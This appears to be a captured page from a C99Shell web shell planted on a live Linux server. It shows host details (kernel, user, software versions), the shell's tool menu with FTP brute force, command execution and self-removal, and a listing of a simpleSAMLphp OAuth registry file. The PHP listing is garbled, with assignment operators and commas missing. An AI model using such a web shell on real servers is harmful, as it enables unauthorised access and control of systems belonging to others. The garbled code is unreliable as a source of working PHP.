!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/3ros/simplesamlphp/modules/oauth/www/   drwxrwxr-x
Free 13.65 GB of 61.93 GB (22.05%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     registry.edit.php (2.15 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/* Load simpleSAMLphp, configuration and metadata */
$config SimpleSAML_Configuration::getInstance();
$session SimpleSAML_Session::getInstance();
$oauthconfig SimpleSAML_Configuration::getOptionalConfig('module_oauth.php');

$store = new sspmod_core_Storage_SQLPermanentStorage('oauth');

//$authsource = $oauthconfig->getValue('auth', 'admin');
$authsource "admin";    // force admin to authenticate as registry maintainer
$useridattr $oauthconfig->getValue('useridattr''user');
//$useridattr = $oauthconfig->getValue('useridattr', 'uid');

if ($session->isValid($authsource)) {
    
$attributes $session->getAttributes();
    
// Check if userid exists
    
if (!isset($attributes[$useridattr])) 
        throw new 
Exception('User ID is missing');
    
$userid $attributes[$useridattr][0];
} else {
    
SimpleSAML_Auth_Default::initLogin($authsourceSimpleSAML_Utilities::selfURL());
}

function 
requireOwnership($entry$userid) {
    if (!isset(
$entry['owner']))
        throw new 
Exception('OAuth Consumer has no owner. Which means no one is granted access, not even you.');
    if (
$entry['owner'] !== $userid
        throw new 
Exception('OAuth Consumer has an owner that is not equal to your userid, hence you are not granted access.');
}

if (
array_key_exists('editkey'$_REQUEST)) {
    
$entryc $store->get('consumers'$_REQUEST['editkey'], '');
    
$entry $entryc['value'];
    
requireOwnership($entry$userid);
    
} else {
    
$entry = array(
        
'owner' => $userid,
        
'key' => SimpleSAML_Utilities::generateID(),
        
'secret' => SimpleSAML_Utilities::generateID(),
    );
}


$editor = new sspmod_oauth_Registry();


if (isset(
$_POST['submit'])) {
    
$editor->checkForm($_POST);

    
$entry $editor->formToMeta($_POST, array(), array('owner' => $userid));

    
requireOwnership($entry$userid);
    
#    echo('<pre>Created: '); print_r($entry); exit;
    
    
$store->set('consumers'$entry['key'], ''$entry);
    
    
$template = new SimpleSAML_XHTML_Template($config'oauth:registry.saved.php');
    
$template->data['entry'] = $entry;
    
$template->show();
    exit;
}

$form $editor->metaToForm($entry);

$template = new SimpleSAML_XHTML_Template($config'oauth:registry.edit.tpl.php');
$template->data['form'] = $form;
$template->show();


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.4855 ]--